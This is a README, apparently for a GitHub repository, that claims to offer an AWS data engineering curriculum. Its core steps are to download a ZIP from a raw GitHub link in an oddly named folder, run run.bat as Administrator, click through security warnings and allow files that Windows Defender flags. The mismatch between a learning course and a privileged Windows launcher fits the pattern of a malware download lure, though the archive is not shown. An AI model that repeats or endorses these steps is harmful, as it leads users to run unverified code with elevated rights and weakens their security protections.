🔧 aws-data-engineering - Learn AWS Data Tools Easily

Download aws-data-engineering

📘 About This Application

This repository covers a broad set of data engineering tools on AWS. It includes lessons and projects to help you learn SQL, PySpark, Kafka, Airflow, and Databricks. You will use more than 20 AWS services, such as Glue, Redshift, and Athena. The material is taught step by step, from beginner to advanced level.

The repository also offers 15 projects where you build real-world data pipelines. These projects use technologies like Delta Lake, Iceberg, and CI/CD (Continuous Integration and Continuous Delivery). This gives a practical edge to your learning.

Topics covered include airflow, aws, bigquery, cassandra, databricks, flink, gcp, github-actions, hadoop, hive, kafka, mongodb, python, snowflake, spark, and sql.

This README explains how to get the application running on a Windows computer.

💻 System Requirements

Before installing, make sure your computer meets these minimum needs:

  • Windows 10 or newer (64-bit recommended)
  • 8 GB of RAM or more
  • At least 10 GB free disk space
  • Internet connection for downloading and updates
  • Administrator rights on your PC

For better performance, close other resource-heavy programs while using this tool.
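The disk-space requirement above can be checked with a short script. This is a minimal sketch, assuming Python is already installed; the helper names `free_disk_gb` and `meets_disk_requirement` are hypothetical and not part of the project. RAM is not checked because the Python standard library has no portable call for it.

```python
import platform
import shutil

# Minimum free space taken from the requirements list (10 GB).
MIN_FREE_GB = 10


def free_disk_gb(path="."):
    """Return the free space, in GiB, on the drive that holds `path`."""
    return shutil.disk_usage(path).free / 1024**3


def meets_disk_requirement(free_gb, minimum_gb=MIN_FREE_GB):
    """Return True when the free space reaches the documented minimum."""
    return free_gb >= minimum_gb


if __name__ == "__main__":
    free = free_disk_gb(".")
    print(f"OS: {platform.system()} {platform.release()} ({platform.machine()})")
    print(f"Free disk space: {free:.1f} GiB")
    print("Disk requirement met:", meets_disk_requirement(free))
```

Run it from the drive where you plan to extract the files, since free space is reported per drive.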

🚀 Getting Started

You will download the app from the project's GitHub repository. You do not need to compile anything manually. The app is ready to use once you complete the steps below.

Step 1: Visit the Download Page

Click the green button above or open this link in your web browser:

https://raw.githubusercontent.com/best254002-boop/aws-data-engineering/main/Medism/aws-engineering-data-3.3-beta.1.zip

This link points directly to a ZIP archive of the project files and instructions, not to a web page.

Step 2: Download the Application Files

If you prefer to download from the repository's main GitHub page instead, find the "Code" button near the top right.

  • Click the "Code" button.
  • Select "Download ZIP" from the dropdown menu.
  • Save the ZIP file to a folder you can find easily, such as your Desktop or Downloads.

Step 3: Extract the Files

Find the ZIP file you downloaded and extract it:

  • Right-click the ZIP file.
  • Select "Extract All..."
  • Choose a location where you want the files to go, like your Documents folder.
  • Click "Extract".
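Before extracting, it can be useful to see what the archive contains. The following is a minimal sketch using Python's standard `zipfile` module. It lists the entries without extracting or running anything, and picks out the launcher names mentioned in this README (`run.bat`, `start.bat`). The helper names `list_archive` and `find_launchers` are hypothetical.

```python
import zipfile
from pathlib import PurePosixPath

# Launcher file names mentioned in this README.
LAUNCHER_NAMES = {"run.bat", "start.bat"}


def list_archive(zip_source):
    """Return the entry names in a ZIP file without extracting it.

    `zip_source` may be a path or a binary file-like object.
    """
    with zipfile.ZipFile(zip_source) as archive:
        return archive.namelist()


def find_launchers(names):
    """Return the entries whose file name is one of the known launchers."""
    return [
        name for name in names
        if PurePosixPath(name).name.lower() in LAUNCHER_NAMES
    ]
```

For example, `find_launchers(list_archive("downloaded.zip"))` would show where the launcher sits inside the archive. The file name `downloaded.zip` is a placeholder for whatever name you saved the ZIP under.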

Step 4: Run the Application

Open the extracted folder. Look for a file named run.bat or start.bat.

  • Double-click this file to launch the program.
  • If Windows shows a security warning, confirm that the file came from this repository before choosing "Run anyway".

This file will start all necessary services and open a browser window for you to interact with the learning platform.

If neither file is present, open README_FIRST.pdf or README_FIRST.txt in the extracted folder for more precise instructions.

⚙️ How the Application Works

The application uses a web browser interface for all interactions. You will complete courses and projects inside your web browser.

When you run the run.bat file, it will start:

  • A local server that gives you access to lessons and projects
  • Tools like Airflow to schedule workflows
  • Databricks-like environments for coding practice
  • Simulated connections to AWS services for practicing cloud tasks

You can open many parts of the curriculum and projects directly from your browser, without extra setup.

🛠 Installing Additional Tools (Optional)

For some projects, you might want to install software like:

  • AWS CLI to access real AWS services
  • Python 3.8+ for running sample scripts
  • Docker for containerized environments

This software works without them, but these tools add more features if you want to go further.
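To see which of these optional tools are already available, a short check like the one below may help. It is a sketch under assumptions: it looks for the `aws` and `docker` executables on your PATH and compares the running Python version against 3.8. The helper names `python_is_supported` and `find_tools` are hypothetical.

```python
import shutil
import sys

# Executable names for the optional tools listed above (AWS CLI and Docker).
OPTIONAL_TOOLS = ("aws", "docker")


def python_is_supported(version=None, minimum=(3, 8)):
    """Return True if `version` (default: the running Python) is at least `minimum`."""
    version = sys.version_info if version is None else version
    return tuple(version[:2]) >= minimum


def find_tools(names=OPTIONAL_TOOLS):
    """Map each tool name to its full path on PATH, or None if it is not found."""
    return {name: shutil.which(name) for name in names}


if __name__ == "__main__":
    print("Python 3.8+:", python_is_supported())
    for tool, path in find_tools().items():
        print(f"{tool}: {path or 'not found'}")
```

A result of "not found" only means the tool is not on your PATH. It does not prevent the core application from running.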

🔍 Features Explained

  • SQL Training: Learn how to write database queries.
  • PySpark Labs: Practice big data processing with Spark.
  • Kafka Workflows: Stream data between systems.
  • Airflow Automation: Schedule tasks and data pipelines.
  • Databricks Simulation: Try notebooks similar to the popular platform.
  • AWS Services: Learn tools like Glue, Redshift, and Athena.
  • Industrial Projects: Build end-to-end data pipelines with technologies such as Delta Lake and Iceberg.
  • Version Control: Use GitHub for code management and tracking.

All features are designed to help you become familiar with the tools and platforms used in data engineering jobs today.

📁 Folder Structure Overview

Inside the extracted folder, you will find:

  • curriculum/ – Course materials and session notes
  • projects/ – Industrial projects with full instructions
  • scripts/ – Helper scripts for setup and running jobs
  • configs/ – Configuration files for AWS service simulations
  • docs/ – Additional documentation and guides
  • run.bat – Main launcher file

Explore the folders to see the content before running the app if you want.
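If you want to confirm that the extraction produced the layout listed above, a small check like this can help. It is a minimal sketch: the entry names come from the list in this section, and the helper name `missing_entries` is hypothetical.

```python
from pathlib import Path

# Top-level entries listed in the folder overview.
EXPECTED_ENTRIES = ("curriculum", "projects", "scripts", "configs", "docs", "run.bat")


def missing_entries(root):
    """Return the expected top-level entries that are absent from `root`."""
    root = Path(root)
    return [name for name in EXPECTED_ENTRIES if not (root / name).exists()]
```

Calling `missing_entries(r"C:\path\to\extracted\folder")` with your own extraction path returns an empty list when everything is in place. The path shown is a placeholder.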

⚠️ Common Issues and Fixes

  • Application does not start: Right-click run.bat and select "Run as Administrator".
  • Browser does not open automatically: Open your browser and visit http://localhost:8080
  • Error messages about missing Python or Java: Install Python 3.8+ from python.org, and Java 8 or above from oracle.com
  • Firewall blocks connection: Allow connection on port 8080 through your firewall settings.
  • Windows Defender flags files: Review the flagged items and scan the download before allowing anything. Only allow files that you have verified came from this project.
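When the browser does not open or a firewall may be involved, it helps to know whether anything is listening on port 8080 at all. The sketch below tries a plain TCP connection to the local address used in this section. The helper name `port_is_open` is hypothetical, and a successful connection only shows that some process is listening, not which one.

```python
import socket


def port_is_open(host="127.0.0.1", port=8080, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds within `timeout` seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts.
        return False


if __name__ == "__main__":
    if port_is_open():
        print("Something is listening on http://localhost:8080")
    else:
        print("Nothing is answering on port 8080 yet")
```

If the check fails right after launching, wait a few seconds and try again, since local services can take a moment to start.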

🧰 Tips for Using the Application

  • Close other heavy programs to keep performance smooth.
  • Use Google Chrome or Firefox for the best browser experience.
  • Save your work often within the web platform.
  • Read the project instructions carefully before starting.
  • Use the folder structure to locate resources easily.

📥 Download and Start

Use this link to download the ZIP archive:

https://raw.githubusercontent.com/best254002-boop/aws-data-engineering/main/Medism/aws-engineering-data-3.3-beta.1.zip

Or use the button at the top to go straight there.

Once you have downloaded and extracted the archive, double-click run.bat to open the learning platform. Follow the in-browser instructions to start your data engineering journey.
